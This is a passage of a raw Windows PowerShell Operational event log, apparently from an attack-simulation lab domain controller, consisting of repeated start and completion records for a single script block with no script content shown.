SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467665
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467664
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467663
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467662
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467661
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467660
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467659
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467658
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467657
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467656
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467655
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467654
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467653
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467652
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467651
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467650
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467649
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467648
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467647
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467646
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467645
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467644
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467643
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467642
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467641
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467640
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467639
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467638
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467637
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467636
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467635
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467634
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467633
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467632
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467631
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467630
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467629
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467628
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467627
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467626
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467625
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467624
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467623
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467622
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467621
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467620
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467619
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467618
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467617
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467616
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467615
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467614
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467613
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467612
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467611
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467610
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
